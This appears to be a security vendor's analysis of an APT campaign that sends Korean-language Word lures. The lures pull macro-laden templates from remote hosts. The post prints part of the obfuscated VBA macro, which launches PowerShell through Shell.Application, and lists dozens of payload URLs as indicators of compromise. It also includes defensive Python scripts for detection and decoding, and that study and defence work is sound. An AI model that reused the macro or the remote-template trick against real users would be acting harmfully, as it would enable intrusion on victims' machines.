APT attack attempts targeting specific individuals using Word documents
The ASEC analysis team has confirmed that malware of the same type as the malicious Word documents previously covered in posts such as "Distribution of malicious Word documents '한국정치외교 학술' (Korean politics and diplomacy academic) and '정책자문위원 약력' (policy advisor biography)" is still being distributed. The recently identified Word files likewise download a dotm file containing a malicious macro through an External link. The identified file names and External addresses are as follows.

| Date found | File name | External URL |
|---|---|---|
| 7/3 | [남북회담본부 정책자문위원] 약력 작성 양식.docx | hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm |
| 7/6 | 00225 한미의원대화 ***.docx | hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| 7/9 | *** 교수님 BIO.docx | hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| 7/12 | *** 교수-BIO.docx | hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm |
| 7/15 | BIO 양식.docx | hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm |

[Table 1] Distributed file names and External URLs
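The "External link" used by these documents is the remote-template mechanism: the .docx carries an attachedTemplate relationship with TargetMode="External" (normally in word/_rels/settings.xml.rels), and Word fetches that URL when the document is opened. The post does not show the rels part, so the triage script below is an added example, not ASEC's tooling; it builds a constructed minimal package that reuses the tbear URL from Table 1 and lists every External relationship. Two details a practitioner should take from it: scan every .rels part rather than only settings.xml.rels, and match on the relationship Type, because the attacker paths in Table 1 deliberately contain "officeDocument/2006/relationships" and "Package/2006/relationships", the same strings that appear in legitimate OOXML namespaces, so a filter that treats those substrings as benign would whitelist the payload URL.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OPC relationship namespace and the WordprocessingML relationship types used
# below. These are spec constants, not values taken from the ASEC post.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
HYPERLINK = ("http://schemas.openxmlformats.org/officeDocument/2006/"
             "relationships/hyperlink")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def external_relationships(docx_bytes):
    """Return every relationship with TargetMode="External" in any .rels part
    of the package, as (rels_part, rel_type, target) tuples."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") == "External":
                    found.append((part, rel.get("Type"), rel.get("Target")))
    return found


def template_injection_urls(docx_bytes):
    """URLs Word will fetch and load as the attached template on open, i.e. the
    delivery mechanism of the documents in Table 1. Filtering on the
    relationship Type (not on the URL text) is what keeps the attacker's
    namespace-lookalike paths from being mistaken for a schema reference."""
    return [target for _, rtype, target in external_relationships(docx_bytes)
            if rtype == ATTACHED_TEMPLATE]


def build_sample_docx():
    """Constructed minimal package (not a real campaign sample): only the parts
    this parser reads. The template target reuses the URL from Table 1; the
    hyperlink relationship is a benign control case."""
    rels = ('<?xml version="1.0" encoding="UTF-8"?>'
            '<Relationships xmlns="%s">%%s</Relationships>' % RELS_NS)
    settings_rels = rels % (
        '<Relationship Id="rId1" Type="%s" TargetMode="External" '
        'Target="http://tbear.mypressonline.com/officeDocument/2006/'
        'relationships/BIO.dotm"/>' % ATTACHED_TEMPLATE)
    document_rels = rels % (
        '<Relationship Id="rId2" Type="%s" TargetMode="External" '
        'Target="https://example.org/"/>' % HYPERLINK)
    settings_xml = ('<w:settings xmlns:w="%s" xmlns:r="%s">'
                    '<w:attachedTemplate r:id="rId1"/></w:settings>' % (W_NS, R_NS))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml", "<Types/>")
        pkg.writestr("_rels/.rels", rels % "")
        pkg.writestr("word/document.xml", '<w:document xmlns:w="%s"/>' % W_NS)
        pkg.writestr("word/settings.xml", settings_xml)
        pkg.writestr("word/_rels/document.xml.rels", document_rels)
        pkg.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    for part, rtype, target in external_relationships(sample):
        print(part, rtype.rsplit("/", 1)[-1], target)
    print("template injection:", template_injection_urls(sample))
```

Running the script against a real suspect file only requires replacing build_sample_docx() with the bytes of the .docx; everything Word needs to trigger the download is inside the zip, so no network access is needed to triage it.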
All of the downloaded dotm files contain the same type of macro as those identified earlier. Below is the malicious macro present in the dotm file downloaded from the External link of BIO 양식.docx (hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm).
```vba
Private Sub Document_Open()
    eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
    Set djfeihfidkasljf = CreateObject("Shell.Application")
    Dim dfgdfjiejfjdshaj As String
    fjdjkasf = "tlsiajdsladkf"
    fjdjkasf = Left(fjdjkasf, 5)    ' separator carved from the decoy string: "tlsia"
    dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
    dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")    ' strips the separator: "powershell.exe"
    hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "    ' same scheme: "[string]$a={(New-Object "
    hdfksallasjkdlaf …
```
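The string obfuscation in this macro is a single trick: every plaintext character is prefixed with a five-character separator, the separator itself is hidden as the first five characters of a decoy literal and recovered with Left(), and Replace() strips it at run time. The decoder below is an added example, not part of the ASEC post or of the sample: it recovers the separator from that Left() idiom rather than hard-coding "tlsia", so it also works on the other dotm variants if they rotate the separator, and it decodes every literal that carries it. On the listing above it yields "powershell.exe" and the opening of a PowerShell one-liner, "[string]$a={(New-Object ", which is as far as the page's truncated listing goes.

```python
import re

# The macro as printed on the page. The last assignment is truncated there and
# is left truncated here; the decoder is added analysis tooling, not part of
# the sample.
VBA_SRC = '''
Private Sub Document_Open()
eifhhdfasfiedf
End Sub
Function eifhhdfasfiedf()
Set djfeihfidkasljf = CreateObject("Shell.Application")
Dim dfgdfjiejfjdshaj As String
fjdjkasf = "tlsiajdsladkf"
fjdjkasf = Left(fjdjkasf, 5)
dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
hdfksallasjkdlaf …
'''

# var = "literal"  (none of these literals contain an escaped "" pair, so [^"]* suffices)
LITERAL_RE = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$', re.M)
# var = Left(var, n)  -- the idiom that carves the separator out of the decoy literal
LEFT_RE = re.compile(r'^\s*(\w+)\s*=\s*Left\(\s*\1\s*,\s*(\d+)\s*\)\s*$', re.M | re.I)


def recover_separator(src):
    """Return (variable, separator): the first n characters of the literal that
    is later shortened with Left(var, n). None if the idiom is absent."""
    literals = {m.group(1): m.group(2) for m in LITERAL_RE.finditer(src)}
    for m in LEFT_RE.finditer(src):
        var, n = m.group(1), int(m.group(2))
        if var in literals:
            return var, literals[var][:n]
    return None


def decode_macro(src):
    """Map each variable to the plaintext of every literal assigned to it that
    carries the separator. str.replace removes non-overlapping occurrences left
    to right, exactly as VBA's Replace does, so a plaintext character that is
    itself one of the separator's letters (the 't' in '[string]') survives."""
    rec = recover_separator(src)
    if rec is None:
        return {}
    sep_var, sep = rec
    decoded = {}
    for m in LITERAL_RE.finditer(src):
        var, lit = m.groups()
        if var != sep_var and sep in lit:
            decoded.setdefault(var, []).append(lit.replace(sep, ""))
    return decoded


if __name__ == "__main__":
    print("separator:", recover_separator(VBA_SRC))
    for var, values in decode_macro(VBA_SRC).items():
        print(var, "->", values)
```

Because the decoded strings are what the macro hands to Shell.Application, they are the right place to hunt: a detection on the VBA text alone sees only "tlsia" noise, whereas the decoded "powershell.exe" plus a "[string]$a={(New-Object " prefix is a concrete, stable artifact to alert on once the downloaded dotm is in hand.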
IoC
http://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://giruz.atwebpages.com/sw/cu.txt
http://vbqwer.mypressonline.com/test.log
http://lovels.myartsonline.com/ys/ha.txt
http://visul.myartsonline.com/yk/yo.txt
http://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.atwebpages.com/ne/la.txt
http://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
http://ccav.myartsonline.com/officeDocument/2006/relationships/BIO
http://stair.myartsonline.com/ya/ng.txt
http://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
http://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO
http://benze.atwebpages.com/ki/mc.txt
http://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://warcr.onlinewebshop.net/le/eh.txt
http://rster.atwebpages.com/an/ce.txt
http://obser.mygamesonline.org/nw.txt
http://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
http://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
http://lovel.myartsonline.com/le/ej.txt
http://mantc.getenjoyment.net/ya/ng.txt
http://likel.atwebpages.com/bu/ma.txt
http://tbear.mypressonline.com/test.txt
http://modri.myartsonline.com/officeDocument/2006/relationships/BIO
http://modri.myartsonline.com/gu/nw.txt
http://tbear.mypressonline.com/ci/mo.txt